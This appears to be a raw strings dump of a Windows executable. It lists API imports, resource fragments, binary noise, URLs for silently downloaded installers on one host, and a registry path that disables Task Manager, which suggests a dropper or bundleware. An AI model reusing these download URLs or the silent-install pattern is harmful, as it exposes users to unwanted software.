GetWindowDC
GetWindowExtEx
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
gggBhhh
ggg|hhh
gggLggg
 (*.GIF)|*.GIF|
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
GrayStringA
`h````
[[[h^^^
h9n`u;
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hgjlkbrfzaoe
HHtiHtGH
HHtpHHtl
H:mm:ss
HrCg@b	g
HSVHWtgHHtF
Ht#HHt
HtHHt(
HtHHuz
HtOHt)H
HtTHtFHt8Ht*Ht
HTTP/1.0
http://download.58611.net:8181/admon/ADMon.29055-8437.exe
http://download.58611.net:8181/baiduan/baiduan_silent_44750464.exe
http://download.58611.net:8181/baidusd/baidusd_silent_44750464.exe
http://download.58611.net:8181/haozip_silent/haozip_silent_44750464.exe
http://download.58611.net:8181/kuwo_silent/kuwo_silent_44750464.exe
http://download.58611.net:8181/pic/pic_silent_44750464.exe
http://download.58611.net:8181/pps/pps_silent_44750464.exe
http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_08437.exe
http://download.58611.net:8181/QQBrowser/QQBrowser_silent_44750464.exe
http://download.58611.net:8181/sogouie/sogouie_silent_44750464.exe
http://download.58611.net:8181/uc/UCBrowser_silent_44750464.exe
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
hWj@_;
HW%tDH
_hypot
 (*.ICO)|*.ICO|
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
IIItHHHJFFF
IIItLLL
ImageList_Destroy
#include "l.chs\afxres.rc"          // Standard components
InflateRect
InitCommonControlsEx
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
InternetCanonicalizeUrlA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
InternetSetOptionA
IntersectRect
InvalidateRect
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsDialogMessageA
IsIconic
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
It#Iu%
\$\}-j
JanFebMarAprMayJunJulAugSepOctNovDec
January
jBWVSSQ
JPEGMEM
 (*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
 (*.JPG)|*.JPG|BMP
j VUPWQ
\\\@[[[jZZZ
KERNEL32
Kernel32.dll
KERNEL32.dll
KillTimer
KKKVMMM
kXEQ>\u
^l_^][
;l$ }:
L$ ]_^
L$0PQR
L$0PQS
L$0SUV@W
L23fff&ff
L$,_^]3
L$,_[3
L$4_^3
L$4_^[d
L$4S+L$0Qj
L$4UQWP
L$4VQUP
L$4WPQR
L$4WQUVS
L$8^]_3
L$8_^][d
L$8WPQR
LANGUAGE 4, 2
LCMapStringA
LCMapStringW
L$`_^][d
L$|_^][d
L$ ^][d
L$ _^d
L$ _^][d
L$,_^][d
L$(_^][d
L$@^[d
L$@_^][d
L$$^[d
L$$^]d
L$$_^d
L$$_^][d
L$\_^][d
L$D_^[d
L$D_^][d
L$D_]d
L$DPQj
L$DSVQ
LeaveCriticalSection
l	g~b0R 
l	g~b0Rdk
L$h_^]3
L$h_^][d
L$H_^][d
L$H][d
L$$h@?H
L$Hj&Q
L$$hP2H
l$HQRVU
L$HSUVWP
LineTo
L$L_^]3
L$l_^][d
L$L^[d
L$L_^][d
LLL4NNN
L$LPQR
L$lRVQ
LoadBitmapA
LoadCursorA
LoadIconA
LoadImageA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LockFile
LockResource
L$P_^d
L$P_]^[d
L$ PQh
L$(PQR
L$@PQR
L$<PQVV
L$pRPQ
LPtoDP
L$(PVQ
L$ QSR
L$,RPQ
L$(RPQ
L$<RPQW
L$@RQj
L$@RUQ
L$<SQR
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
L$,SUV
L$(SUV
L$T_^]
L$t_^d
L$t][d
L$T_^]d
L$T_^][d
|$LtE;
L$TSWQ
L$(UUh
\$lUV3
L$(VQRSP
L$(VQVj
l$@VW3
l$<VWj
L$ WPQ
L$(WQR
L$(WSR
L$X_^]3
L$x_^d
L$x_^][d
L$X_^d
L$X;L$
L$XSQh
@;l$\~Z
mailto:
MapWindowPoints
M/d/yy
MessageBoxA
MGridCells
Microsoft Visual C++ Runtime Library
midiOutPrepareHeader
midiOutReset
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamProperty
midiStreamRestart
midiStreamStop
 (*.MID)|*.MID|
MIME-Version: 1.0
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveToEx
MoveWindow
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mpr.dll
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
(((n(((
n0SSSSU
-NbkSbpS
-NbkSbpS(
nd9~dt
N/f@b	g
NH_^][
Nh;NX|
-N"N1Y
N*Ncktepe
N*Ntepe
N*N(W%
N*N(W0
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nt2Ht#Ht
NTRPQj
(null)
N$~	WU
NX9NXu 
Nyt2S	W	w	w
nzzpenc
O(_^][
o0SSSSU
October
OffsetRect
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenDatabase
OpenPrinterA
out.prn
OX[0R 
~P9~Pun
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
PA#define _AFX_NO_SPLITTER_RESOURCES
PatBlt
PathToRegion
.PAVCArchiveException@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCUserException@@
PeekMessageA
Ph_^][Y
P#include "afxres.h"
PostMessageA
PostQuitMessage
PPPPhd
PPPPPPPP
P<PuWSV
ppxxxx
PQj WUS
PQQQQQ
\$ PQV
#pragma code_page(936)
PreviewPages
 (*.prn)|*.prn|
Program: 
<program name unknown>
P$RWPh
~'PSQR
PtInRect
PtVisible
- pure virtual function call
@PVj,S
\$PVUUS
PWVWWW
QPSWVR
QQQpTTT
QQSVW3
QQSVWd
QQSVWj
QQUWSS
QRWh(BH
QSUVWj
QX[gbL
RaiseException
RASAPI32.dll
RasGetConnectStatusA
RasHangUpA
`.rdata
ReadFile
RealizePalette
Rectangle
RectVisible
RedrawWindow
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueA
RegSetValueExA
ReleaseCapture
ReleaseDC
ReleaseSemaphore
RemovePlayer
RemovePropA
Reply-To: %s
resource.h
RestoreDC
ResumeThread
RoundRect
|$,RPQ
RRR2TTT
RSbpS\O
RtlUnwind
runtime error 
Runtime Error!
RVPUSQ
RWh(>H
Saturday
SaveDC
SbpS0R
SbpS@b	gu
SbpS:g:
SbpS\O
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
ScrollWindowEx
SelectClipRgn
SelectObject
SelectPalette
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetBkMode
SetCapture
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetCursorPos
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
SetParent
SetPolyFillMode
SetPropA
SetRect
SetRectEmpty
SetROP2
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
Shell32.dll
SHELL32.dll
ShellExecuteA
Shell_NotifyIconA
\shell\open\command
Shift+F1
Shift+F10
Shift+F11
Shift+F12
Shift+F2
Shift+F3
Shift+F4
Shift+F5
Shift+F6
Shift+F7
Shift+F8
Shift+F9
ShowWindow
SING error
sO;>|C;~
software
Software\
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr
%s <%s>
SS@SSPVSS
_SSSSU
StartDocA
StartPage
StretchBlt
Subject: %s
Sunday
SunMonTueWedThuFriSat
SWVVVRPV
System
SystemParametersInfoA
^^^t```
+++t***
T$0PQR
T$0RPQ
T$0SUV
(/?t-2C40/E
@t4Ht1Ht_Ht
T$8QRP
T$8RWj
t$ 90t
t	9p$u
t&9^$t
TabbedTextOutA
T$$+D$4
tD9_Pt?
T$dPQR
T$DPQRW
T$DQRU
T$DQSR
T$DWRh
T$\;D$Xu
TerminateProcess
TextOutA
T/f&Tcknx
<]t_G<-uA
!This program cannot be run in DOS mode.
t>Ht Ht
t+Ht$Ht
Thursday
T$H} VP
tI;Ftr
T$\jdSR
+tJHt:Ht*
TLOSS error
T$lPRh
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t$LUPh
T$LWUQVR
tn<%t2
tooltips_class32
To: %s
T$pPQR
t$PPVS
T$(PQR
T$\PQR
T$PQRP
T$ PQWWR
T$$PRV
tq9~Dt
T$ QRP
T$(QVURWP
TranslateAcceleratorA
TranslateMessage
T$$Rh`
tRHt}H
T$,RQP
t%RSQP
t$$RVP
T$<RVW
tS9~@uN
T$ SRh
T$,SRh
t$(SSh
t#SSUP
T$ SWRP
+ttHHtd
t.;t$$t(
Tuesday
T$\URP
t$$VSS
tvWWWWU
T$\WVR
t/WWUPj
 (*.txt)|*.txt|
T$XUSR
;t$Xu";\$\u
t$XWVS
tYh8DH
?u='@^
u._^][
u29l$xu,
u"8D$yu
u]9B uX
u	9~@u
>:u#FV
u-h;1F
uh9^8uX
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
UnhookWindowsHookEx
UNLINK
UnlockFile
UnregisterClassA
UpdateWindow
uR9BxuM
uRFGHt
us-ascii
USER32
user32.dll
User32.dll
USER32.dll
u$SShe
\$(UVW
ValidateRect
VC20XC00U
V#D$,WPQ
Vh;VX|
VirtualAlloc
VirtualFree
VVVTYYY
\$<VW3
VWtp9E
VWuBhh
V,_^[Y
W9^du-
WaitForMultipleObjects
WaitForSingleObject
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPause
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
 (*.WAV;*.MID)|*.WAV;*.MID|WAV
 (*.WAV)|*.WAV|MIDI
Wednesday
	WG!2S(
WideCharToMultiByte
window
WindowFromPoint
windows
WinExec
WinHelpA
WININET.dll
WINMM.dll
WINSPOOL.DRV
WjdjdPQh
Wj(_Wj
|$$}$WP
(wqt\HHtS
WriteFile
WritePrivateProfileStringA
WS2_32.dll
wsprintfA
WTWindow
|$@ Wu
"WWSh(
wwwwww
XY[Z[]
YHYtLHt9
YX[(W	
_^][YY
YYF;5@
YYY@[[[
Z`k(][c
|z;^<}uWS